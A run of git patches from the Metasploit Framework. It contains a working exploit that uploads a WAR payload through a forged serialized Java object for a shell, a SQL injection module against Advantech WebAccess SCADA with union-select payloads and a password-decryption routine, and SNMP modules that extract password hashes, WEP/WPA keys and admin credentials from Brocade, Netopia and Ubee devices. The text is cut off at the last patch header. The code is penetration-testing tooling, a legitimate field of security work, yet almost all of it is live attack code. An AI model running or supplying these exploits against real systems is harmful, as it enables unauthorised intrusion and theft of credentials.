send_xml_rpc_request(xml_call) + + if res && res.code == 200 && res.body + result = parse_method_response(res.body.to_s) + end + + result + end + + def upload_war(war_name, war, dst) + result = false + java_file = build_java_file_info("#{dst}#{war_name}", war) + java_file = Rex::Text.encode_base64(java_file) + + res = put_file(java_file) + + if res && res =~ /ReturnObject.*StatusMessage.*Boolean/ + result = true + end + + result + end + + def jboss_deploy_path + path = nil + leak = get_file("bin/CreateDatabaseSchema.cmd") + + if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/ + path = $1 + end + + path + end + + def check + check_result = Exploit::CheckCode::Safe + + if jboss_deploy_path.nil? + xml = build_soap_check_put + res = send_xml_rpc_request(xml) + + if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/ + check_result = Exploit::CheckCode::Detected + end + else + check_result = Exploit::CheckCode::Appears + end + + check_result + end + + def exploit + print_status("#{peer} - Leaking the jboss deployment directory...") + jboss_path =jboss_deploy_path + + if jboss_path.nil? + fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory") + end + + print_status("#{peer} - Building WAR payload...") + + app_name = Rex::Text.rand_text_alpha(4 + rand(4)) + war_name = "#{app_name}.war" + war = payload.encoded_war({ :app_name => app_name }).to_s + deploy_dir = "..#{jboss_path}" + + print_status("#{peer} - Uploading WAR payload...") + + res = upload_war(war_name, war, deploy_dir) + + unless res + fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload") + end + + register_files_for_cleanup("../server/appstream/deploy/#{war_name}") + + 10.times do + select(nil, nil, nil, 2) + + # Now make a request to trigger the newly deployed war + print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...") + res = send_request_cgi( + { + 'uri' => normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)), + 'method' => 'GET', + 'rport' => ste_port # Auto Deploy can be reached through the "as_ste.exe" service + }) + # Failure. The request timed out or the server went away. + break if res.nil? + # Success! Triggered the payload, should have a shell incoming + break if res.code == 200 + end + + end + + def ste_port + datastore['STE_PORT'] + end + + # com.appstream.cm.general.FileInfo serialized object + def build_java_file_info(file_name, contents) + stream = "\xac\xed" # stream magic + stream << "\x00\x05" # stream version + stream << "\x73" # new Object + + stream << "\x72" # TC_CLASSDESC + stream << ["com.appstream.cm.general.FileInfo".length].pack("n") + stream << "com.appstream.cm.general.FileInfo" + stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier + stream << "\x02" # flags SC_SERIALIZABLE + stream << [6].pack("n") # number of fields in the class + + stream << "Z" # boolean + stream << ["bLastPage".length].pack("n") + stream << "bLastPage" + + stream << "J" # long + stream << ["lFileSize".length].pack("n") + stream << "lFileSize" + + stream << "[" # array + stream << ["baContent".length].pack("n") + stream << "baContent" + stream << "\x74" # TC_STRING + stream << ["[B".length].pack("n") + stream << "[B" # field's type (byte array) + + stream << "L" # Object + stream << ["dTimeStamp".length].pack("n") + stream << "dTimeStamp" + stream << "\x74" # TC_STRING + stream << ["Ljava/util/Date;".length].pack("n") + stream << "Ljava/util/Date;" #field's type (Date) + + stream << "L" # Object + stream << ["sContent".length].pack("n") + stream << "sContent" + stream << "\x74" # TC_STRING + stream << ["Ljava/lang/String;".length].pack("n") + stream << "Ljava/lang/String;" #field's type (String) + + stream << "L" # Object + stream << ["sFileName".length].pack("n") + stream << "sFileName" + stream << "\x71" # TC_REFERENCE + stream << [0x007e0003].pack("N") # handle + + stream << "\x78" # TC_ENDBLOCKDATA + stream << "\x70" # TC_NULL + + # Values + stream << [1].pack("c") # bLastPage + + stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize + + stream << "\x75" # TC_ARRAY + stream << "\x72" # TC_CLASSDESC + stream << ["[B".length].pack("n") + stream << "[B" # byte array) + stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier + stream << "\x02" # flags SC_SERIALIZABLE + stream << [0].pack("n") # number of fields in the class + stream << "\x78" # TC_ENDBLOCKDATA + stream << "\x70" # TC_NULL + stream << [contents.length].pack("N") + stream << contents # baContent + + stream << "\x70" # TC_NULL # dTimeStamp + + stream << "\x70" # TC_NULL # sContent + + stream << "\x74" # TC_STRING + stream << [file_name.length].pack("n") + stream << file_name # sFileName + + stream + end + +end From 9091ce443a084746c405278d8a8bd11b1566ff44 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 00:59:27 -0500 Subject: [PATCH 319/853] Add suport to decode passwords --- .../advantech_webaccess_dbvisitor_sqli.rb | 120 ++++++++++++++++-- 1 file changed, 110 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index fc0b0b772a..8985ee25e3 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -114,9 +114,9 @@ class Metasploit3 < Msf::Auxiliary if i < (strings_length / 3) @users.push(result) elsif i < (strings_length / 3) * 2 - @passwords.push(result) + @enc_passwords.push(result) else - @passwords2.push(result) + @keys.push(result) end i = i + 1 end @@ -143,8 +143,9 @@ class Metasploit3 < Msf::Auxiliary end @users = [] - @passwords = [] - @passwords2 = [] + @enc_passwords = [] + @keys = [] + @plain_passwords = [] print_status("#{peer} - Parsing extracted data...") parse_users(data, mark) @@ -159,26 +160,125 @@ class Metasploit3 < Msf::Auxiliary users_table = Rex::Ui::Text::Table.new( 'Header' => 'Advantech WebAccess Users', 'Ident' => 1, - 'Columns' => ['Username', 'Password Hash', 'Password Hash 2'] + 'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password'] ) for i in 0..@users.length - 1 + @plain_passwords[i] = decrypt_password(@enc_passwords[i], @keys[i]) + @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty? report_auth_info({ :host => rhost, :port => rport, :user => @users[i], - :pass => "#{@passwords[i]}:#{@passwords2[i]}", - :type => "hash", + :pass => @plain_passwords[i], + :type => "password", :sname => (ssl ? "https" : "http"), - :proof => data # Using proof to store the hash salt + :proof => "Leaked encrypted password: #{@enc_passwords[i]}:#{@keys[i]}" }) - users_table << [@users[i], @passwords[i], @passwords2[i]] + users_table << [@users[i], @enc_passwords[i], @keys[i], @plain_passwords[i]] end print_line(users_table.to_s) - end + def decrypt_password(password, key) + recovered_password = recover_password(password) + recovered_key = recover_key(key) + + recovered_bytes = decrypt_bytes(recovered_password, recovered_key) + password = [] + + recovered_bytes.each { |b| + if b == 0 + break + else + password.push(b) + end + } + + return password.pack("C*") + end + + def recover_password(password) + bytes = password.unpack("C*") + recovered = [] + + i = 0 + j = 0 + while i < 16 + low = bytes[i] + + if low < 0x41 + low = low - 0x30 + else + low = low - 0x37 + end + + low = low * 16 + + high = bytes[i+1] + if high < 0x41 + high = high - 0x30 + else + high = high - 0x37 + end + + recovered_byte = low + high + + recovered[j] = recovered_byte + + i = i + 2 + j = j + 1 + end + + recovered + end + + def recover_key(key) + bytes = key.unpack("C*") + recovered = 0 + + bytes[0, 8].each { |b| + recovered = recovered * 16 + if b < 0x41 + byte_weight = b - 0x30 + else + byte_weight = b - 0x37 + end + + recovered = recovered + byte_weight + } + + recovered + end + + def decrypt_bytes(bytes, key) + result = [] + xor_table = [0xaa, 0xa5, 0x5a, 0x55] + key_copy = key + for i in 0..7 + byte = (crazy(bytes[i] ,8 - (key & 7)) & 0xff) + result.push(byte ^ xor_table[key_copy & 3]) + key_copy = key_copy / 4 + key = key / 8 + end + + result + end + + def crazy(byte, magic) + result = byte & 0xff + + while magic > 0 + result = result * 2 + if result & 0x100 == 0x100 + result = result + 1 + end + magic = magic - 1 + end + + result + end end From 7ec85c9d3a4de5f47628ee4fa154caa1f0ced465 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 01:03:04 -0500 Subject: [PATCH 320/853] Delete blank lines --- .../admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 8985ee25e3..88bb7830ba 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -207,13 +207,11 @@ class Metasploit3 < Msf::Auxiliary j = 0 while i < 16 low = bytes[i] - if low < 0x41 low = low - 0x30 else low = low - 0x37 end - low = low * 16 high = bytes[i+1] @@ -224,9 +222,7 @@ class Metasploit3 < Msf::Auxiliary end recovered_byte = low + high - recovered[j] = recovered_byte - i = i + 2 j = j + 1 end @@ -245,7 +241,6 @@ class Metasploit3 < Msf::Auxiliary else byte_weight = b - 0x37 end - recovered = recovered + byte_weight } From 3c1363b990765f72ce8f4657d6564f59de1075c1 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 16 May 2014 08:32:46 -0500 Subject: [PATCH 321/853] Add new SNMP enumeration modules --- .../scanner/snmp/brocade_enumhash.rb | 74 ++++++++ .../auxiliary/scanner/snmp/netopia_enum.rb | 102 +++++++++++ .../auxiliary/scanner/snmp/ubee_ddw3611.rb | 159 ++++++++++++++++++ 3 files changed, 335 insertions(+) create mode 100644 modules/auxiliary/scanner/snmp/brocade_enumhash.rb create mode 100644 modules/auxiliary/scanner/snmp/netopia_enum.rb create mode 100644 modules/auxiliary/scanner/snmp/ubee_ddw3611.rb diff --git a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb new file mode 100644 index 0000000000..b06f16ec29 --- /dev/null +++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb @@ -0,0 +1,74 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::SNMPClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Brocade Password Hash Enumeration', + 'Description' => %q{ + This module extracts password hashes from certain Brocade load + balancer devices. + }, + 'References' => + [ + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ] + ], + 'Author' => ['Deral "PercentX" Heiland'], + 'License' => MSF_LICENSE + ) + + end + + def run_host(ip) + begin + snmp = connect_snmp + + if snmp.get_value('sysDescr.0') =~ /Brocade/ + + @users = [] + snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.1") do |row| + row.each { |val| @users << val.value.to_s } + end + + @hashes = [] + snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.2") do |row| + row.each { |val| @hashes << val.value.to_s } + end + + print_good("#{ip} Found Users & Password Hashes:") + end + + credinfo = "" + @users.each_index do |i| + credinfo << "#{@users[i]}:#{@hashes[i]}" << "\n" + print_good("#{@users[i]}:#{@hashes[i]}") + end + + + #Woot we got loot. + loot_name = "brocade.hashes" + loot_type = "text/plain" + loot_filename = "brocade_hashes.txt" + loot_desc = "Brodace username and password hashes" + p = store_loot(loot_name, loot_type, datastore['RHOST'], credinfo , loot_filename, loot_desc) + + print_status("Credentials saved: #{p}") + rescue ::SNMP::UnsupportedVersion + rescue ::SNMP::RequestTimeout + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_error("#{ip} error: #{e.class} #{e}") + disconnect_snmp + end + end +end diff --git a/modules/auxiliary/scanner/snmp/netopia_enum.rb b/modules/auxiliary/scanner/snmp/netopia_enum.rb new file mode 100644 index 0000000000..44f87f1508 --- /dev/null +++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb @@ -0,0 +1,102 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::SNMPClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Netopia 3347 Cable Modem Wifi Enumeration', + 'Description' => %q{ + This module extracts WEP keys and WPA preshared keys from + certain Netopia cable modems. + }, + 'References' => + [ + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ] + ], + 'Author' => ['Deral "PercentX" Heiland'], + 'License' => MSF_LICENSE + ) + + end + + def run_host(ip) + output_data = {} + begin + snmp = connect_snmp + + if snmp.get_value('sysDescr.0') =~ /Netopia 3347/ + + wifistatus = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.1.0') + if wifistatus == "1" + wifiinfo = "" + ssid = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.9.1.2.1') + print_good("#{ip}") + print_good("SSID: #{ssid}") + wifiinfo << "SSID: #{ssid}" << "\n" + + wifiversion = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.9.1.4.1') + if wifiversion == "1" + + #Wep enabled + elsif wifiversion == ("2"||"3") + wepkey1 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.1') + print_good("WEP KEY1: #{wepkey1}") + wifiinfo << "WEP KEY1: #{wepkey1}" << "\n" + wepkey2 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.2') + print_good("WEP KEY2: #{wepkey2}") + wifiinfo << "WEP KEY2: #{wepkey2}" << "\n" + wepkey3 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.3') + print_good("WEP KEY3: #{wepkey3}") + wifiinfo << "WEP KEY3: #{wepkey3}" << "\n" + wepkey4 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.4') + print_good("WEP KEY4: #{wepkey4}") + wifiinfo << "WEP KEY4: #{wepkey4}" << "\n" + actkey = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.13.0') + print_good("Active Wep key is Key#{actkey}") + wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n" + + #WPA enabled + elsif wifiversion == "4" + print_line("Device is configured for WPA ") + wpapsk = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.9.1.5.1') + print_good("WPA PSK: #{wpapsk}") + wifiinfo << "WPA PSK: #{wpapsk}" << "\n" + + #WPA Enterprise enabled + elsif wifiversion == "5" + print_line("Device is configured for WPA enterprise") + else + print_line("FAILED") + end + + else + print_line("WIFI is not enabled") + end + end + #Woot we got loot. + loot_name = "netopia_wifi" + loot_type = "text/plain" + loot_filename = "netopia_wifi.txt" + loot_desc = "Netopia Wifi configuration data" + p = store_loot(loot_name, loot_type, datastore['RHOST'], wifiinfo , loot_filename, loot_desc) + print_status("WIFI Data saved: #{p}") + + rescue ::SNMP::UnsupportedVersion + rescue ::SNMP::RequestTimeout + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_error("#{ip} error: #{e.class} #{e}") + disconnect_snmp + end + end +end diff --git a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb new file mode 100644 index 0000000000..68a59454ac --- /dev/null +++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb @@ -0,0 +1,159 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::SNMPClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Ubee DDW3611b Cable Modem Wifi Enumeration', + 'Description' => %q{ + This module will extract WEP keys and WPA preshared keys from + certain Ubee cable modems. + }, + 'References' => + [ + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ] + ], + 'Author' => ['Deral "PercentX" Heiland'], + 'License' => MSF_LICENSE + ) + + end + + def run_host(ip) + output_data = {} + begin + snmp = connect_snmp + + if snmp.get_value('1.2.840.10036.2.1.1.9.12') =~ /DDW3611/ + print_good("#{ip}") + wifiinfo = "" + + # System user account and Password + username = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0') + print_good("Username: #{username}") + wifiinfo << "Username: #{username}" << "\n" + password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0') + print_good("Password: #{password}") + wifiinfo << "Password: #{password}" << "\n" + + wifistatus = snmp.get_value('1.3.6.1.2.1.2.2.1.8.12') + if wifistatus == 1 + ssid = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.3.12') + print_good("SSID: #{ssid}") + wifiinfo << "SSID: #{ssid}" << "\n" + + #Wifi Security Version + wifiversion = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.5.12') + if wifiversion == "0" + print_line("Open Access Wifi is Enabled") + + #Wep enabled + elsif wifiversion == "1" + weptype = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.2.12') + if weptype == "2" + wepkey1 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.1') + key1 = "#{wepkey1}".unpack('H*') + print_good("WEP KEY1: #{key1}") + wifiinfo << "WEP KEY1: #{key1}" << "\n" + wepkey2 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.2') + key2 = "#{wepkey2}".unpack('H*') + print_good("WEP KEY2: #{key2}") + wifiinfo << "WEP KEY2: #{key2}" << "\n" + wepkey3 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.3') + key3 = "#{wepkey3}".unpack('H*') + print_good("WEP KEY3: #{key3}") + wifiinfo << "WEP KEY3: #{key3}" << "\n" + wepkey4 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.4') + key4 = "#{wepkey4}".unpack('H*') + print_good("WEP KEY4: #{key4}") + wifiinfo << "WEP KEY4: #{key4}" << "\n" + actkey = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.1.12') + print_good("Active Wep key is #{actkey}") + wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n" + + elsif weptype == "1" + wepkey1 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.1') + key1 = "#{wepkey1}".unpack('H*') + print_good("WEP KEY1: #{key1}") + wifiinfo << "WEP KEY1: #{key1}" << "\n" + wepkey2 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.2') + key2 = "#{wepkey2}".unpack('H*') + print_good("WEP KEY2: #{key2}") + wifiinfo << "WEP KEY2: #{key2}" << "\n" + wepkey3 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.3') + key3 = "#{wepkey3}".unpack('H*') + print_good("WEP KEY3: #{key3}") + wifiinfo << "WEP KEY3: #{key3}" << "\n" + wepkey4 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.4') + key4 = "#{wepkey4}".unpack('H*') + print_good("WEP KEY4: #{key4}") + wifiinfo << "WEP KEY4: #{key4}" << "\n" + actkey = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.1.12') + print_good("Active Wep key is #{actkey}") + wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n" + + else + print_line("FAILED") + end + + #WPA enabled + elsif wifiversion == "2" + print_line("Device is configured for WPA ") + wpapsk = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12') + print_good("WPA PSK: #{wpapsk}") + wifiinfo << "WPA PSK: #{wpapsk}" << "\n" + + #WPA2 enabled + elsif wifiversion == "3" + print_line("Device is configured for WPA2") + wpapsk2 = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12') + print_good("WPA2 PSK: #{wpapsk2}") + wifiinfo << "WPA PSK: #{wpapsk2}" << "\n" + + #WPA Enterprise enabled + elsif wifiversion == "4" + print_line("Device is configured for WPA enterprise") + + #WPA2 Enterprise enabled + elsif wifiversion == "5" + print_line("Device is configured for WPA2 enterprise") + + #WEP 802.1x enabled + elsif wifiversion == "6" + print_line("Device is configured for WEP 802.1X") + + else + print_line("FAILED") + end + + else + print_line("WIFI is not enabled") + end + end + #Woot we got loot. + loot_name = "ubee_wifi" + loot_type = "text/plain" + loot_filename = "ubee_wifi.txt" + loot_desc = "Ubee Wifi configuration data" + p = store_loot(loot_name, loot_type, datastore['RHOST'], wifiinfo , loot_filename, loot_desc) + print_status("WIFI Data saved: #{p}") + + rescue ::SNMP::UnsupportedVersion + rescue ::SNMP::RequestTimeout + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_error("#{ip} error: #{e.class} #{e}") + disconnect_snmp + end + end +end From c9465a892282e049943c71dae4f5e3ef1fe36421 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 08:57:59 -0500 Subject: [PATCH 322/853] Rescue when the recovered info is in a format we can't understand --- .../admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 88bb7830ba..e5475ed0a7 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -164,7 +164,13 @@ class Metasploit3 < Msf::Auxiliary ) for i in 0..@users.length - 1 - @plain_passwords[i] = decrypt_password(@enc_passwords[i], @keys[i]) + @plain_passwords[i] = + begin + decrypt_password(@enc_passwords[i], @keys[i]) + rescue + "(format not recognized)" + end + @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty? report_auth_info({ :host => rhost, From ea38a2c6e5685e6733fa4a29020b6133b5963629 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 11:11:58 -0500 Subject: [PATCH 323/853] Handle ISO-8859-1 special chars --- .../admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index e5475ed0a7..69c8d661fe 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -172,6 +172,15 @@ class Metasploit3 < Msf::Auxiliary end @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty? + + begin + @plain_passwords[i].encode("ISO-8859-1").to_s + rescue Encoding::UndefinedConversionError + chars = @plain_passwords[i].unpack("C*") + @plain_passwords[i] = "0x#{chars.collect {|c| c.to_s(16)}.join(", 0x")}" + @plain_passwords[i] << " (ISO-8859-1 hex chars)" + end + report_auth_info({ :host => rhost, :port => rport, @@ -184,6 +193,7 @@ class Metasploit3 < Msf::Auxiliary users_table << [@users[i], @enc_passwords[i], @keys[i], @plain_passwords[i]] end + print_status("#{users_table.inspect}") print_line(users_table.to_s) end From 883d2f14b51c9e29f769c0df7660d314bfb41f87 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 11:13:03 -0500 Subject: [PATCH 324/853] delete debug print_status --- .../auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 69c8d661fe..1b8b6b7e53 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -193,7 +193,6 @@ class Metasploit3 < Msf::Auxiliary users_table << [@users[i], @enc_passwords[i], @keys[i], @plain_passwords[i]] end - print_status("#{users_table.inspect}") print_line(users_table.to_s) end From 4143474da93031b4703d4535ff452e32c85651e5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 11:47:01 -0500 Subject: [PATCH 325/853] Add support for web databases --- .../advantech_webaccess_dbvisitor_sqli.rb | 36 ++++++++----------- 1 file changed, 15 insertions(+), 21 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 1b8b6b7e53..5d8d7b7886 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -18,8 +18,8 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The vulnerability exists in the DBVisitor.dll component, and can be abused through malicious - requests to the ChartThemeConfig web service. This module can be used to extract the BEMS - site usernames and hashes. + requests to the ChartThemeConfig web service. This module can be used to extract the site + and projects usernames and hashes. }, 'References' => [ @@ -40,7 +40,8 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']) + OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']), + OptString.new("WEB_DATABASE", [true, 'The path to the bwCfg.mdb database in the target', "C:\\WebAccess\\Node\\config\\bwCfg.mdb"]) ], self.class) end @@ -98,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary Msf::Exploit::CheckCode::Vulnerable end - def parse_users(xml, mark) + def parse_users(xml, mark, separator) doc = Document.new(xml) strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string").map(&:text) @@ -111,13 +112,7 @@ class Metasploit3 < Msf::Auxiliary i = 0 strings.each do |result| next if result == mark - if i < (strings_length / 3) - @users.push(result) - elsif i < (strings_length / 3) * 2 - @enc_passwords.push(result) - else - @keys.push(result) - end + @users << result.split(separator) i = i + 1 end @@ -127,13 +122,14 @@ class Metasploit3 < Msf::Auxiliary print_status("#{peer} - Exploiting sqli to extract users information...") mark = Rex::Text.rand_text_alpha(8 + rand(5)) rand = Rex::Text.rand_text_numeric(2) + separator = Rex::Text.rand_text_alpha(5 + rand(5)) # While installing I can only configure an Access backend, but # according to documentation other backends are supported. This # injection should be compatible, hopefully, with most backends. injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " - injection << "union all select UserName from BAUser where #{rand}=#{rand} " - injection << "union all select Password from BAUser where #{rand}=#{rand} " - injection << "union all select Password2 from BAUser where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from BAUser where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" data = do_sqli(injection, mark) @@ -143,12 +139,10 @@ class Metasploit3 < Msf::Auxiliary end @users = [] - @enc_passwords = [] - @keys = [] @plain_passwords = [] print_status("#{peer} - Parsing extracted data...") - parse_users(data, mark) + parse_users(data, mark, separator) if @users.empty? print_error("#{peer} - Users not found") @@ -166,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary for i in 0..@users.length - 1 @plain_passwords[i] = begin - decrypt_password(@enc_passwords[i], @keys[i]) + decrypt_password(@users[i][1], @users[i][2]) rescue "(format not recognized)" end @@ -184,13 +178,13 @@ class Metasploit3 < Msf::Auxiliary report_auth_info({ :host => rhost, :port => rport, - :user => @users[i], + :user => @users[i][0], :pass => @plain_passwords[i], :type => "password", :sname => (ssl ? "https" : "http"), - :proof => "Leaked encrypted password: #{@enc_passwords[i]}:#{@keys[i]}" + :proof => "Leaked encrypted password: #{@users[i][1]}:#{@users[i][2]}" }) - users_table << [@users[i], @enc_passwords[i], @keys[i], @plain_passwords[i]] + users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i]] end print_line(users_table.to_s) From 2012d41b3d21cd524b03651b7e6d954f1f08ba90 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 13:51:42 -0500 Subject: [PATCH 326/853] Add origin of the user, and mark web users --- .../advantech_webaccess_dbvisitor_sqli.rb | 23 ++++++++++++++----- 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb 